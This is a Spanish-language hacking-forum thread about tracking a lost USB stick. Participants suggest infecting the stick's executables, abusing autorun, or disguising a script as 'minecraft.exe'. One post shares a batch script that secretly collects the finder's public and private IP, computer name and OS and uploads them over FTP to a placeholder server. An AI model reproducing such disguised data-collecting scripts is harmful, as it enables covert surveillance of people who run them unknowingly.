elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [UTILIDAD] Si pierdes tu USB..
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [UTILIDAD] Si pierdes tu USB..  (Leído 7,044 veces)
kub0x
Enlightenment Seeker
Colaborador
Desconectado Desconectado

S3C M4NI4C

Ver Perfil
Re: [UTILIDAD] Si pierdes tu USB..
« Respuesta #10 en: 25 Marzo 2014, 09:53 »

Podrías infectar los ejecutables que residen en la memoria USB con el código que envía la localización actual del dispositivo al servidor remoto. También podrías aprovecharte del autorun ya que algunos equipos lo tienen configurado arrancando así el programa indicado en el archivo autorun.inf.
Podrías crear entradas falsas en el autorun para engañar al usuario cuando se muestre el diálogo del autoplay, crear accesos directos que ejecuten ciertas órdenes... hay infinidad de métodos de ejecutar nuestro programa de seguimiento.

Aunque todo depende donde vaya a parar tu memoria USB, ya que el usuario no tiene porque tener una conexión a internet, o puede que tenga una política de acceso/control a internet muy restrictiva (Firewall), lo suyo sería en caso extremo borrar la memoria USB sin necesidad de conexión a internet, o bien meter mano en el ordenador del ladrón. Aquí debemos de evaluar si la memoria USB fue realmente robada :P

Saludos y comentad más técnicas si se os ocurren ;)

« Última modificación: 25 Marzo 2014, 12:12 por kub0x » En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

PedroDJavier

Ver Perfil
« Respuesta #11 en: 26 Marzo 2014, 15:20 »

La idea del autorun no es bueno ya que si lo meto en mi PC se activaria el script y lo que queremos es que un usuario que encuentre el USB al meterlo en su PC vea por ejemplo minecraft.exe pero eso es el script en realidad lo que nos enviaria nuestros datos ademas de un archivo txt con la IP privada y publica pudiendo saber si esta en casa de alguien conocido (o hay que llamar a la policia para que nos den nuestro USB aunque eso ya es algo extremo). Luego bloquear el USB para que no se pueda grabar ni borrar nada, aunque esto se puede hacer mejor al inicio evitando que el usuario que se lo encontro borre o modifique nuestros datos.

Bueno me pondre a currar, que ya tengo miedo y no saco mis USB de casa xD
Salu2!

Eleкtro
Ex-Staff
*

Ver Perfil
« Respuesta #12 en: 26 Marzo 2014, 15:42 »

La idea del Script no es que me desagrade, pero viendo que tanta gente le da vueltas a intentar perfeccionar un sistema de protección/prevención mediante Scripts y archivos Fakes... ¿porque simplemente no protegen sus USB con contraseña y encriptan los archivos, y listo?... de tal manera que si os lo roban, no hay que preocuparse por la privacidad del contenido.
Para dicha tarea recomiendo el uso de la aplicación USB Secure.

Si yo me encontrase un USB, lo último que haría es ejecutar cualquier archivo .exe que hubiese dentro :xD (y creo que la mayoría de personas tampoco lo harían), al menos no los ejecutaría en mi S.O. huesped.

Y lo del Autorun para un dispositivo USB, bueno, que decir... es una caracteristica descontinuada (obsoleta, no funcional) en cualquier version de windows superior a Windows Vista.

Saludos
« Última modificación: 26 Marzo 2014, 15:57 por Eleкtro » En línea

Franny

Software Developer

Ver Perfil WWW
« Respuesta #13 en: 27 Marzo 2014, 06:27 »

Bueno, no siempre encontrará tu usb un informático como nosotros que hará lo imposible por saber que había dentro o simplemente borrara todo rastro para su uso personal. También esta la posibilidad de que lo encuentre gente que no se maneje mucho en la pc, por eso yo decía lo de la partición, cosa que crean que les es inservibles y al menos te lo devuelvan o algo por el estilo. Saludos

PedroDJavier

Ver Perfil
« Respuesta #14 en: 28 Marzo 2014, 15:32 »

Vamos a ver señores xD:

La idea principal es poder recuperar nuestros datos y que el que se lo encuentre no los vea, pero principalmente recuperarlos.

Y ya que el USB lo tenemos que usar todos los dias pues la idea es que introduzcamos una clave o algo para poder usarlo y si la clave es erronea pues por ejemplo 5 veces te envia los datos y se borra.

Bueno, llevo algo de codigo haber que les parece:
Código:
@echo off

::::::::::::::::::::::::::::::::::::::::::::::PREPARATIVOS (NO TOCAR)::::::::::::::::::::::::::::::::::::::::::

XCOPY %MYFILES%\rar.exe %cd% & XCOPY %MYFILES%\Unrar.exe %cd%

::CONFIGURACION::

::::::::::::::::::::::::::::::::::::::::::SERVIDOR A ENVIAR DATOS:::::::::::::::::::::::::::::::::::::::::::::
                                         set server=www.sever.net

:::CONFIG DEL SERVER:::

set usuar=nombredeusuario
                                          set passw=contrasenadelusuario

:::::::::::::::::::::::::::::::::::::::::::::NOMBRE DEL USB:::::::::::::::::::::::::::::::::::::::::::::::::::
                                          set usbname=pendriverojocumpleaños

:::IP_PUBLICA:::

:ipublica
for %%a in ("anonymous"," ","literal stat","close","quit") do      (echo.%%~a>>ipublica.txt)
for /f "tokens=3" %%a in ('ftp -s:ftp.txt ftp.opera.com^|find "Connected to"') do (echo. IP: %%a>ipublica.txt)
pause
del /f ftp.txt

:::IP_PRIVADA:::

:iprivada
ipconfig all >iprivada.txt

:::DATOS EXTRA:::

:extradata
echo Nombre Del USB:%usbname% > extra.txt
echo Hora del PC:%time% >> extra.txt
echo Fecha del PC:%date% >> extra.txt
echo Nombre del PC:%computername% >> extra.txt
echo Sistema Operativo:%OS% >> extra.txt

:::DATOS DEL USB:::

:usbdata
XCOPY %cd%

::::::::::::::::::::::::::::::::::::::::::::::.ENVIO DE DATOS.::::::::::::::::::::::::::::::::::::::::::::::::

echo open %server% 21 > FTP_IN.txt
echo user %usuar% %passw% >> FTP_IN.txt
echo bin >> FTP_IN.txt
echo prompt >> FTP_IN.txt
echo cd dumpeos >> FTP_IN.txt
echo put ipublica.txt >> FTP_IN.txt
echo put iprivada.txt >> FTP_IN.txt
echo put extra.txt >> FTP_IN.txt
echo put backup.zip >> FTP_IN.txt
echo bye >> FTP_IN.txt
ftp -n -s:FTP_IN.txt>> FTP_OUT.txt
del FTP_IN.txt
del FTP_OUT.txt
exit

Bueno, la parte de copiarse sus datos y luego borrarlos no se como hacerla espero que se les ocurra algo.

Tambien Decir que luego estaria compilado con Quck Batch file Compile y supongo que en ghost mode.
Un saludo!

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Pierdes el tiempo en el foro? « 1 2 »
Foro Libre
danielo- 12 2,923 Último mensaje 26 Abril 2010, 15:36
por EvilGoblin
ASM ....utilidad en reversing?
Ingeniería Inversa
Tinkipinki 5 2,925 Último mensaje 20 Septiembre 2011, 18:46